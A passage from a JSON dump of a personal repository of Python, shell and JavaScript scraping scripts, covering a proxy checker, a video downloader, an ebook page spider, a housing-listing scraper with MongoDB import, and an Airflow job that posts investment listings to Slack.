self.check_url(url)\n self._apply_rule(index, url, ret)\n\n def _before_check(self):\n raise NotImplementedError\n\n def _apply_rule(self, index, url, ret):\n raise NotImplementedError\n\n def _after_check(self):\n raise NotImplementedError\n\n\nclass NormalChecker(ProxyChecker):\n url_list = [\n 'http://www.baidu.com',\n 'http://weibo.com',\n 'http://zhihu.com',\n 'http://tower.im',\n 'http://www.acfun.tv',\n ]\n factor = 0.8\n\n def _before_check(self):\n self.succ_cnt = 0\n\n def _apply_rule(self, index, url, ret):\n if ret.get('succ', False):\n with lock:\n self.succ_cnt += 1\n\n def _after_check(self):\n n = len(self.url_list)\n if n * self.factor <= self.succ_cnt:\n logging.debug('Check %s is successful' % (self.proxy_host))\n self.ret['ping'] = True\n\n\nclass LadderChecker(ProxyChecker):\n \"\"\"If >=factor*n url pass then threat as valid\n \"\"\"\n url_list = [\n 'http://www.twitter.com',\n 'http://www.google.com',\n 'http://www.facebook.com',\n 'http://www.youtube.com',\n 'http://www.blogger.com',\n ]\n factor = 0.8\n\n def _before_check(self):\n 
self.succ_cnt = 0\n\n def _apply_rule(self, index, url, ret):\n if ret.get('succ', False):\n with lock:\n self.succ_cnt += 1\n\n def _after_check(self):\n n = len(self.url_list)\n if n * self.factor <= self.succ_cnt:\n logging.debug('Check in gfw %s is successful' % (self.proxy_host))\n self.ret['ping'] = True\n\n\ndef put_set(conn):\n \"\"\"Check timeout host which need be checked again and put it in set\n \"\"\"\n set_list = [settings.NORMAL_S, settings.GFW_S]\n while True:\n for set_name in set_list:\n while conn.scard(set_name) > 0:\n host = conn.srandmember(set_name, 0)\n expire_key = build_key([settings.EXPIRE_PRE, host])\n expire_time = conn.get(expire_key)\n expire_time = _datetime(expire_time) if expire_time else datetime.datetime.fromtimestamp(0)\n if datetime.datetime.now() - expire_time >= settings.EXPIRE_DELTA:\n conn.sadd(settings.HOST_S, host)\n conn.srem(set_name, host)\n logging.debug(\"Push from %s set with %s\" % (set_name, host))\n time.sleep(0.2)\n time.sleep(3)\n\n\ndef check_proxy(conn):\n \"\"\"Check proxy from channel\n \"\"\"\n set_dict = (\n (settings.NORMAL_S, NormalChecker),\n (settings.GFW_S, LadderChecker),\n )\n while True:\n time.sleep(0.2)\n host = conn.spop(settings.HOST_S)\n if host is None:\n continue\n for set_name, checker in set_dict:\n pc = checker(host)\n pc.check_proxy()\n if pc.ret.get('ping', False):\n conn.sadd(set_name, host)\n expire_key = build_key([settings.EXPIRE_PRE, host])\n conn.set(expire_key, datetime.datetime.now()+settings.EXPIRE_DELTA)\n logging.debug(\"Proxy[%s] check successfully in %s\" % (pc.proxy_host, set_name))\n\n\ndef signal_handler(signal, frame):\n print 'Press Ctrl-C!'\n sys.exit(0)\n\n\ndef main():\n signal.signal(signal.SIGINT, signal_handler)\n conn = RedisPool.get_pool(settings.REDIS_HOST, settings.REDIS_PORT, settings.REDIS_DB)\n check_proxy_task = threading.Thread(target=check_proxy, args=(conn, ))\n put_set_task = threading.Thread(target=put_set, args=(conn, ))\n check_proxy_task.setDaemon(True)\n put_set_task.setDaemon(True)\n check_proxy_task.start()\n put_set_task.start()\n while True:\n time.sleep(1)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n main()\n"
},
{
"alpha_fraction": 0.5890949964523315,
"alphanum_fraction": 0.6008993983268738,
"avg_line_length": 29.672412872314453,
"blob_id": "f762cfd1bc0c7cea789529141d46e7c9297df38a",
"content_id": "1bcac39c069629524469ea7ebd5f625b96df97c3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1779,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 58,
"path": "/caoporn/get_mp4.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom __future__ import print_function\nimport sys\nimport os\nimport argparse\nimport re\nimport requests\nimport urllib\nfrom tqdm import tqdm\n\n\ndef get_mp4(url):\n r = requests.get(url)\n content = r.content.decode('utf-8')\n m = re.search(r'textarea name=\"video_embed_code[^>]+>([^<]+)</textarea>', content)\n if not m:\n return ''\n emb_url = m.group(1).strip()\n r = requests.get(emb_url)\n content = r.content.decode('utf-8')\n m = re.search(r'<source src=\"([^\"]+.mp4[^\"]+)\"', content)\n if not m:\n return ''\n mp4_url = m.group(1).strip()\n return mp4_url\n\ndef download(url, output_dir):\n up = urllib.parse.urlparse(url)\n file_name = os.path.basename(up.path)\n r = requests.get(url, stream=True)\n total_length = int(r.headers.get('content-length', 0))\n with open(os.path.join(output_dir, file_name), 'wb') as f, tqdm(total=total_length, unit='B', unit_scale=True) as pbar:\n for data in r.iter_content(chunk_size=4096):\n f.write(data)\n pbar.update(4096)\n\ndef main():\n parser = argparse.ArgumentParser()\n mut_group = parser.add_mutually_exclusive_group(required=True)\n mut_group.add_argument('-c', '--code', nargs='*')\n mut_group.add_argument('-u', '--url', nargs='*')\n parser.add_argument('-od', '--output-dir', type=str)\n args = parser.parse_args()\n if args.code:\n urls = []\n for code in args.code:\n urls.append('https://51.caoxee.com/video/%s' % code)\n else:\n urls = args.url\n true_urls = list(map(get_mp4, urls))\n if args.output_dir:\n list(map(lambda url: download(url, args.output_dir), filter(lambda x: x != '', true_urls)))\n else:\n list(map(print, true_urls))\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5323208570480347,
"alphanum_fraction": 0.5350467562675476,
"avg_line_length": 36.21739196777344,
"blob_id": "b4634e803e8bcb4d8a994a1caea7009f3b8492ff",
"content_id": "b5804cd7ebdd442dd9f1975596b2115985687152",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2568,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 69,
"path": "/duokan/duokan/spiders/base.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport logging\nimport os\nimport scrapy\nimport simplejson\nimport duokan.dkbson as dk\nfrom duokan.items import BookInfo, IssItem\n\nlogger = logging.getLogger('duokan')\n\nclass FileSaverMixin(object):\n\n def parse_book_info(self, response):\n book_info = simplejson.loads(dk.decode(response.body))\n url_dir = os.path.join('url', book_info['book_id'])\n os.makedirs(url_dir, exist_ok=True)\n\n def parse_page(self, response):\n meta = response.request.meta\n dir = os.path.join('url', meta['book_id'])\n page_info = simplejson.loads(dk.decode(response.body))\n with open(os.path.join(dir, meta['page_id']), 'w') as f:\n f.write(page_info['url'])\n\n\nclass BaseSpider(scrapy.Spider, FileSaverMixin):\n name = 'base'\n allowed_domains = ['duokan.com']\n cookie = None\n save_file = False\n\n def parse_book_info(self, response):\n if response.status != 200:\n return\n if self.save_file:\n super().parse_book_info(response)\n book_info = simplejson.loads(dk.decode(response.body))\n yield BookInfo({'id': book_info['book_id'], 'data': book_info})\n for idx, page in enumerate(book_info['pages']):\n yield scrapy.Request('http://www.duokan.com/reader/page/%s/%s?trait=medium' % (book_info['book_id'], page['page_id']),\n cookies=self.cookie,\n callback=self.parse_page,\n meta={'book_id': book_info['book_id'], 'page_id': page['page_id'], 'page_num': idx},\n )\n\n def parse_page(self, response):\n req = response.request\n if response.status != 200:\n logger.warning('no page content, meta[%s]' % (req.meta))\n return\n page_info = simplejson.loads(dk.decode(response.body))\n if page_info.get('status') != 'ok':\n logger.warning('page_info is not ok[%s]' % (page_info))\n return\n if self.save_file:\n super().parse_page(response)\n return\n yield IssItem({\n 'book_id': req.meta['book_id'],\n 'page_id': req.meta['page_id'],\n 'page_num': req.meta['page_num'],\n 'url': page_info['url'],\n })\n yield scrapy.Request(page_info['url'],\n cookies=self.cookie,\n callback=self.save_page,\n meta=req.meta,\n dont_filter=True,\n )\n"
},
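The `BaseSpider` above inherits from both `scrapy.Spider` and `FileSaverMixin` and reaches the mixin's `parse_book_info`/`parse_page` through `super()`; this works because Python's MRO continues past `scrapy.Spider` (which lacks those methods) to the mixin. A minimal, Scrapy-free sketch of that dispatch; the class names here are illustrative, not part of the project:

```python
# Stand-ins: Base plays the role of scrapy.Spider (no parse_page of its own),
# FileSaver plays the role of FileSaverMixin.
class FileSaver:
    def parse_page(self, response):
        print("mixin: saving", response)

class Base:
    pass

class MySpider(Base, FileSaver):
    def parse_page(self, response):
        # super() walks the MRO (Base, then FileSaver); Base has no
        # parse_page, so this call lands on FileSaver.parse_page.
        super().parse_page(response)
        print("spider: extra handling of", response)

print([c.__name__ for c in MySpider.__mro__])  # MySpider, Base, FileSaver, object
MySpider().parse_page("page-1")
```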
{
"alpha_fraction": 0.6255506873130798,
"alphanum_fraction": 0.6321585774421692,
"avg_line_length": 44.400001525878906,
"blob_id": "335ed4f9f2bc9868faadaab8fdd53ee633f6704f",
"content_id": "88442310015d4a088f7ccacef27f35f569e93445",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 454,
"license_type": "permissive",
"max_line_length": 165,
"num_lines": 10,
"path": "/house/lianjia/import_db.sh",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\ndir=${1:-bj}\ndir=${dir%/}\nfor i in ${dir}/[0-9]*.json; do\n echo \"$i\"\n while read -r line; do\n echo \"$line\" | jq --compact-output --raw-output '.data.list' | mongoimport -d lianjia -c \"$dir\" --jsonArray --mode=upsert --upsertFields=house_code\n done < \"$i\"\ndone\njq --compact-output --raw-output '.data' \"$dir\"/bizcircle_*.json | mongoimport -d lianjia -c \"${dir}_community\" --jsonArray --mode=upsert --upsertFields=community_id\n"
},
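`import_db.sh` relies on `jq` plus `mongoimport --mode=upsert --upsertFields=house_code`. For readers who prefer to stay in Python, a rough pymongo equivalent of that upsert; the connection string and input file name are assumptions for illustration:

```python
# Rough pymongo counterpart of the mongoimport upsert in import_db.sh.
import json
from pymongo import MongoClient, ReplaceOne

client = MongoClient("mongodb://localhost:27017")   # assumed local mongod
coll = client["lianjia"]["bj"]

houses = []
with open("bj/12345_name.json") as f:               # hypothetical dump file
    for line in f:                                   # one JSON object per line
        houses.extend(json.loads(line)["data"]["list"])

# --upsertFields=house_code: replace the document with the same house_code,
# insert it if no match exists.
ops = [ReplaceOne({"house_code": h["house_code"]}, h, upsert=True) for h in houses]
if ops:
    coll.bulk_write(ops)
```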
{
"alpha_fraction": 0.5040322542190552,
"alphanum_fraction": 0.5564516186714172,
"avg_line_length": 19.66666603088379,
"blob_id": "2e6e115bc822251fe50911bef67533e4ef1ff812",
"content_id": "4614f241346ff3b95caac9c3b7d4fba56aafb4d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 248,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 12,
"path": "/house/lianjia/run.sh",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\ncode=${1:-110000}\ndir=${2:-./}\nfor i in {1..100}; do\n echo \"$i\"\n rm -f \"bizcircle_${code}.json\"\n python get_all_house.py \"$code\" --output-dir \"$dir\" && break\n ret=$?\n echo \"return code is $ret\"\n sleep 1\ndone\nexit $ret\n"
},
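`run.sh` wraps the crawler in a retry loop (up to 100 attempts, sleeping briefly between failures). The same guard expressed in Python, should the shell wrapper be inconvenient; the script name and arguments mirror the original:

```python
# Python counterpart of the retry loop in run.sh.
# run.sh also removes bizcircle_<code>.json before each attempt; omitted here.
import subprocess
import sys
import time

ret = 0
for attempt in range(1, 101):
    print(attempt)
    ret = subprocess.call([sys.executable, "get_all_house.py", "110000",
                           "--output-dir", "./"])
    if ret == 0:
        break
    print("return code is", ret)
    time.sleep(1)
sys.exit(ret)
```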
{
"alpha_fraction": 0.5949770212173462,
"alphanum_fraction": 0.6034665703773499,
"avg_line_length": 32.654762268066406,
"blob_id": "298d501a471f8c8d052471e20f6187ed0d65d1c6",
"content_id": "cb19d0a0a747677f6401c3f649777befb4970abb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2827,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 84,
"path": "/house/lianjia/get_all_house.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport json\nimport os\nimport datetime\nimport urllib\nimport requests\nimport time\nimport argparse\nfrom tqdm import tqdm\n\n\nbizcircle_url = 'http://ajax.lianjia.com/ajax/mapsearch/area/bizcircle?city_id={code}'\ncircle_url = 'http://ajax.lianjia.com/ajax/housesell/area/bizcircle?ids={ids}&limit_offset={cursor}&limit_count={step}&sort=&&city_id={code}'\nck_file = 'checkpoint'\nSTEP_DELAY = 0.5 # seconds\nDELAY = 2 # seconds\n\n\ndef wget_lj(url, file=None, dir='./', append=False):\n ts = int(time.time() * 1000)\n url += '&_={ts}'.format(ts=ts)\n content = requests.get(url, timeout=15).content\n if file:\n mode = 'a' if append else 'w'\n with open(os.path.join(dir, file), mode) as f:\n f.write(content+'\\n')\n return content\n\n\ndef load_checkpoint(dir='./'):\n start_cir_id = 0\n start_i = 0\n try:\n with open(os.path.join(dir, ck_file), 'r') as f:\n start_cir_id = int(f.readline())\n except:\n pass\n return start_cir_id, start_i\n\n\ndef save_checkpoint(cir_id, dir='./'):\n with open(os.path.join(dir, ck_file), 'w') as f:\n f.writelines([str(cir_id)])\n\n\ndef main():\n step = 200\n parser = argparse.ArgumentParser()\n parser.add_argument('city_code', nargs='?', default=110000, type=int, help='city code')\n parser.add_argument('-o', '--output-dir', required=False, default='./', type=os.path.abspath, help='save directory')\n parser.add_argument('-d', '--debug', required=False, default=False, action='store_true')\n args = parser.parse_args()\n dir = args.output_dir\n if not os.path.exists(dir):\n os.mkdir(dir)\n city_code = args.city_code\n bizcircle = json.loads(wget_lj(bizcircle_url.format(code=city_code), file='bizcircle_%s.json' % (city_code), dir=dir), encoding='utf-8')\n start_cir_id, start_i = load_checkpoint(dir)\n start = (start_cir_id == 0)\n for cir in tqdm(bizcircle['data'], desc='bizcircle', disable=not args.debug):\n cir_id = cir['id']\n if not start:\n if cir_id == start_cir_id:\n start = True\n continue\n cir_name = cir['name']\n cir_cnt = cir['house_count']\n cir_ids = [str(cir_id)]\n circle_list = []\n file = '%s_%s.json' % (cir_id, cir_name)\n desc = 'circle detail [%s:%s]' % (cir_name, cir_id)\n for i in tqdm(range(0, cir_cnt, step), desc=desc, disable=not args.debug):\n url = circle_url.format(ids=urllib.quote(','.join(cir_ids)), cursor=i, step=step, code=city_code)\n house_list = json.loads(wget_lj(url, file=file, dir=dir, append=True))['data']['list']\n circle_list.extend(house_list)\n time.sleep(STEP_DELAY)\n time.sleep(DELAY)\n save_checkpoint(cir_id, dir)\n\n\nif __name__ == '__main__':\n main()\n"
},
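The checkpointing in `get_all_house.py` is what makes the long crawl restartable. Distilled to its core (the checkpoint file name matches the original; the work loop is a placeholder), the pattern looks like this:

```python
# Core of the resume-from-checkpoint pattern in get_all_house.py: persist the
# last finished unit of work, then skip up to (and including) it on restart.
import os

CK_FILE = "checkpoint"

def load_checkpoint():
    try:
        with open(CK_FILE) as f:
            return f.read().strip()
    except IOError:
        return None

def save_checkpoint(value):
    tmp = CK_FILE + ".tmp"
    with open(tmp, "w") as f:          # write-then-rename keeps the file
        f.write(str(value))            # intact even if we crash mid-write
    os.rename(tmp, CK_FILE)

done_until = load_checkpoint()
skipping = done_until is not None
for item in ["101", "102", "103"]:     # stands in for the bizcircle ids
    if skipping:
        if item == done_until:
            skipping = False
        continue
    print("crawling", item)            # placeholder for the real work
    save_checkpoint(item)
```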
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 21,
"blob_id": "122383da1d2dc77591cb6e60373e39e3ff555e28",
"content_id": "869b312fbd40e892046ad79aea51bb14adb537f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 44,
"license_type": "permissive",
"max_line_length": 25,
"num_lines": 2,
"path": "/README.md",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# scrapy_projects\nMy scrapy project scripts\n"
},
{
"alpha_fraction": 0.3617810904979706,
"alphanum_fraction": 0.37105751037597656,
"avg_line_length": 30.647058486938477,
"blob_id": "e51bab7f57c5565b8af12301008d400b83ebf5a0",
"content_id": "7cefd9ff23486968711bef25d72371be74b0c1ba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 539,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 17,
"path": "/caoporn/caoporn/mongo_func.js",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "db.system.js.save({\n _id: \"convert\",\n value: function () {\n db.video.find({'$or': [{'length': {'$type': 2}}, {'views': {'$type': 2}}]}).forEach(\n function(doc){\n length=0;\n sp=doc.length.split(':');\n for (i in sp){\n length=length*60+parseInt(sp[i]);\n }\n db.video.update({'_id': doc._id},\n {'$set': {'views': parseInt(doc.views), 'length': length}}\n );\n }\n );\n }\n})\n\n"
},
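The stored `convert` function above normalizes `length` strings such as "1:02:03" into seconds and `views` strings into integers. The same base-60 fold in Python, handy for checking the conversion outside Mongo:

```python
# Python equivalent of the "mm:ss"/"h:mm:ss" -> seconds fold in convert().
def to_seconds(s):
    total = 0
    for part in s.split(":"):
        total = total * 60 + int(part)
    return total

assert to_seconds("4:05") == 245
assert to_seconds("1:02:03") == 3723
```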
{
"alpha_fraction": 0.6003937125205994,
"alphanum_fraction": 0.6043307185173035,
"avg_line_length": 35.261905670166016,
"blob_id": "72f4e6480cffc718f42989a389d1836c9a57a16e",
"content_id": "c5c4174bad32317c640f194a32e6ab5d1228c7fb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1524,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 42,
"path": "/house/lianjia/find_change.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport pymongo\nimport argparse\nimport datetime\nimport scrapy\nimport pprint\nfrom settings import MONGO_DB, MONGO_URI\n\n\ndef _date(s):\n return datetime.datetime.strptime(s, '%Y%m%d').date()\n\ndef main():\n today = datetime.date.today()\n yesterday = today - datetime.timedelta(days=1)\n parser = argparse.ArgumentParser()\n parser.add_argument('-b', '--begin_date', required=False,\n default=yesterday.strftime('%Y%m%d'), type=_date, help='the house whose day need be compared')\n parser.add_argument('-e', '--end_date', required=False,\n default=None, type=_date, help='the house whose day need be compared')\n parser.add_argument('-d', '--dir', required=False, default='both', choices=['both', 'gt', 'lt'])\n args = parser.parse_args()\n begin_date = args.begin_date\n end_date = args.end_date or begin_date + datetime.timedelta(days=1)\n\n mongo_uri = MONGO_URI\n mongo_db = MONGO_DB\n client = pymongo.MongoClient(mongo_uri)\n db = client[mongo_db]\n tbl_name = 'bj%s' % end_date.strftime('%Y%m%d')\n cond = [{'house_price_history.0.time': {'$gte': '%s' % begin_date, '$lt': '%s' % end_date}},]\n if args.dir != 'both':\n cond.append(\n {'house_price_history.0.old_price': {'$%s' % args.dir: 'house_price_history.0.new_price'}}\n )\n q = db[tbl_name].find({'$and': cond})\n print q.count()\n # for house in q.find({'$and': cond}):\n # pprint.pprint(house)\n\nif __name__ == \"__main__\":\n main()\n\n"
},
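Note that the `$gt`/`$lt` branch in `find_change.py` compares `house_price_history.0.old_price` against the literal string `'house_price_history.0.new_price'`, not against the other field's value. A field-to-field comparison needs an aggregation expression; a hedged sketch of one way to write it, assuming MongoDB 3.6+ for `$expr`:

```python
# Sketch of a field-to-field price comparison with $expr; field names follow
# find_change.py, and `direction` is 'gt' or 'lt' as in args.dir.
direction = "gt"
cond_expr = {
    "$expr": {
        "$%s" % direction: [
            {"$arrayElemAt": ["$house_price_history.old_price", 0]},
            {"$arrayElemAt": ["$house_price_history.new_price", 0]},
        ]
    }
}
# cond.append(cond_expr) would then compare the two fields of the first
# history entry instead of comparing against a constant string.
```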
{
"alpha_fraction": 0.5990272760391235,
"alphanum_fraction": 0.6109159588813782,
"avg_line_length": 30.36440658569336,
"blob_id": "16fffa76f4df1ee471b0e79ce55b648f60b79c29",
"content_id": "00243fe6d68aff4058cb40880bb748935ebe5e20",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3709,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 118,
"path": "/small/xiaoying/notice_dag.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom StringIO import StringIO\nfrom os import path, environ\nfrom airflow import DAG\nfrom airflow.operators import BashOperator, BranchPythonOperator, PythonOperator, SlackAPIPostOperator\nfrom utils import period2timedelta, money2float\nfrom filter import Filter\nimport datetime\nimport pandas as pd\n\n\ndef need_run(ti, execution_date, **kwargs):\n long_time = datetime.timedelta(seconds=60*10)\n if ti.start_date and execution_date and ti.start_date - execution_date < long_time:\n return 'run_spider'\n return ''\nslack_message_key = 'slack_message'\ncsv_file = 'xy.csv'\ndir = path.abspath(path.dirname(__file__))\ndef filter_data(csv_file, start_day=28, end_day=90, interest=780, state=None, **kwargs):\n f = pd.read_csv(csv_file)\n f['sub_title'] = f['sub_title'].fillna('')\n candidate = []\n filter = Filter()\n filter.install_rule(lambda v: v['period'] <= datetime.timedelta(days=20) and v['benefit'] > 6, ok_stop=True, weight=5)\n filter.install_rule(lambda v: v['benefit'] >= 8 and v['period'] < datetime.timedelta(days=230))\n filter.install_rule(lambda v: not v['sub_title'].startswith('新手专享'))\n for row in f.iterrows():\n idx, v = row\n money = money2float(v['money'])\n period = period2timedelta(v['period'])\n # remove percent sign(%)\n benefit = float(v['expected_benefit'][:-1])\n item = {\n 'title': v['title'],\n 'sub_title': v['sub_title'],\n 'money': money,\n 'period': period,\n 'benefit': benefit,\n }\n if filter.check(item):\n candidate.append(item)\n return candidate\n\n\ndef need_slack(ti, **kwargs):\n candidate = ti.xcom_pull(key=None, task_ids='filter_data')\n if candidate and len(candidate) > 0:\n s = StringIO()\n for can in candidate:\n s.write('%s(%s) money: %s period: %s days benefit: %s%%\\n' % (\n can['title'],\n can['sub_title'],\n can['money'],\n can['period'].days,\n can['benefit'],\n ))\n ti.xcom_push(slack_message_key, s.getvalue().decode('utf-8'))\n return 'post_slack'\n return ''\n\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime.datetime(2017, 1, 5),\n 'email': ['[email protected]', ],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 3,\n 'retry_delay': datetime.timedelta(minutes=5),\n 'queue': 'bash_queue',\n 'provide_context': True,\n 'retry_exponential_backoff': True,\n # 'end_date': datetime.datetime(2017, 1, 1),\n}\n\ndag = DAG('xiaoying', default_args=default_args, schedule_interval='* 8-22 * * *')\n\n\nonly_run_now = BranchPythonOperator(\n task_id='only_run_now',\n python_callable=need_run,\n dag=dag\n)\nrun_spider = BashOperator(\n task_id='run_spider',\n bash_command='cd {dir} && rm -f {csv_file} && scrapy runspider spiders/invest.py -t csv -o {csv_file}'.format(dir=dir, csv_file=csv_file),\n dag=dag\n)\n\nfilter_data = PythonOperator(\n task_id='filter_data',\n python_callable=filter_data,\n op_args=(csv_file, ),\n dag=dag\n)\n\nneed_slack = BranchPythonOperator(\n task_id='need_slack',\n python_callable=need_slack,\n dag=dag\n)\n\nslack_token = environ.get('SLACK_TOKEN')\ntxt = '''{{ task_instance.xcom_pull(task_ids='need_slack', key='%s') }}''' % (slack_message_key)\nif txt is None:\n txt = 'Nothing to read'\npost_slack = SlackAPIPostOperator(\n task_id='post_slack',\n token=slack_token,\n channel='#xiaoying',\n username='airflow',\n text='{{ execution_date }}\\n' + txt,\n dag=dag\n)\n\nonly_run_now >> run_spider >> filter_data >> need_slack >> post_slack\n"
},
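`need_run` and `need_slack` above steer the DAG through `BranchPythonOperator`: the callable returns the `task_id` to continue with, and the other directly downstream tasks are skipped (returning an empty string, as this DAG does, skips them all). A self-contained sketch of that contract; task names and the schedule are illustrative, and the import path assumes Airflow 1.x like the original:

```python
import datetime
from airflow import DAG
from airflow.operators.python_operator import BranchPythonOperator, PythonOperator

dag = DAG("branch_demo", start_date=datetime.datetime(2017, 1, 1),
          schedule_interval="@hourly")

def choose(execution_date, **kwargs):
    # Return the task_id of the branch to follow; the other one is skipped.
    return "morning_task" if execution_date.hour < 12 else "evening_task"

branch = BranchPythonOperator(task_id="branch", python_callable=choose,
                              provide_context=True, dag=dag)
morning = PythonOperator(task_id="morning_task",
                         python_callable=lambda: None, dag=dag)
evening = PythonOperator(task_id="evening_task",
                         python_callable=lambda: None, dag=dag)
branch >> morning
branch >> evening
```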
{
"alpha_fraction": 0.663690447807312,
"alphanum_fraction": 0.6815476417541504,
"avg_line_length": 29.545454025268555,
"blob_id": "529db666c4d2325cf69b047340ba710b6e9d07a5",
"content_id": "3556b7d1774b552fd4cb050c919adb25908b08d9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 336,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 11,
"path": "/house/lianjia/readme.md",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "```shell\npip install -r requirements.txt\nbrew install jq mongodb\n```\n```python\npython get_all_house.py [110000] --output-dir bj$(date '+%Y%m%d')\n./import_db.sh bj$(date '+%Y%m%d')\n```\nIf you want to restart your scrapy you may need `rm bj$(date '+%Y%m%d')/checkpoint`.\n\nIf you need add some filter conditions you can refer `load_bj.sh`\n"
},
{
"alpha_fraction": 0.525612473487854,
"alphanum_fraction": 0.5334075689315796,
"avg_line_length": 22.63157844543457,
"blob_id": "619222f52647ba4f0e41448ddde5dd13a9eba689",
"content_id": "c5e599520564074ad573c6fa2deaa70e3c92b1ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 898,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 38,
"path": "/small/xiaoying/filter.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\n\nclass Rule(object):\n\n \"\"\"Filter fule\"\"\"\n\n def __init__(self, func, ok_stop=False, weight=10):\n \"\"\"\n\n :func: filter function\n :ok_stop: if ok stop process later rule\n :weight: weight, smaller will go first\n\n \"\"\"\n self.func = func\n self.ok_stop = ok_stop\n self.weight = weight\n\nclass Filter(object):\n\n \"\"\"Filter good invest.\"\"\"\n last_weight = 10\n\n def __init__(self):\n self._rules = []\n\n def install_rule(self, func, ok_stop=False, weight=last_weight+1):\n self._rules.append(Rule(func, ok_stop, weight))\n self.last_weight = weight + 1\n\n def check(self, item):\n for f in sorted(self._rules, key=lambda r: r.weight):\n ok = f.func(item)\n if f.ok_stop and ok:\n return True\n if not ok:\n return False\n return True\n"
},
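A short usage sketch for `Filter`, mirroring how `notice_dag.py` wires it up; it assumes the module above is importable as `filter`, and the rule bodies are simplified examples:

```python
from filter import Filter   # the module above

f = Filter()
# ok_stop rule: if it matches, accept immediately and skip later rules.
f.install_rule(lambda v: v["benefit"] > 6, ok_stop=True, weight=5)
# ordinary rule: must hold for every item that was not short-circuited.
f.install_rule(lambda v: not v["title"].startswith("promo"))

print(f.check({"benefit": 7, "title": "promo deal"}))   # True: first rule short-circuits
print(f.check({"benefit": 3, "title": "promo deal"}))   # False: second rule rejects
```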
{
"alpha_fraction": 0.5676156878471375,
"alphanum_fraction": 0.5782918334007263,
"avg_line_length": 22.41666603088379,
"blob_id": "1c72a010396db8d197ce92d6cc2e8b22fe6d9370",
"content_id": "42de957998f2fa13c495e62f45cf429d209054a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 562,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 24,
"path": "/duokan/duokan/decode.js",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "var process = require('process');\nvar fs = require('fs');\nvar dk = require(\"./dkbson\");\nif (process.argv.length <= 1){\n console.log(\"Usage: node \"+process.argv[1]+\" bson_file\");\n process.exit(1);\n}\nvar decode_bson = function(str){\n res = dk.dkbson.decode(str.trim());\n if (res.status == 'error'){\n console.log(res);\n process.exit(2);\n }\n console.log(\"%j\", res);\n};\n\nfile_name = process.argv[2];\n\nfs.readFile(file_name, 'utf8', function(err, data) {\n if (err) {\n return console.log(err);\n }\n decode_bson(data);\n});\n"
},
{
"alpha_fraction": 0.6278026700019836,
"alphanum_fraction": 0.6295964121818542,
"avg_line_length": 33.84375,
"blob_id": "132097cffa711f38e8eb1acd7458897c11597c81",
"content_id": "e3b9c54d6678c2dac56f1528343f847d22f69dab",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1115,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 32,
"path": "/proxy/proxy/downloadermiddlewares/proxy.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
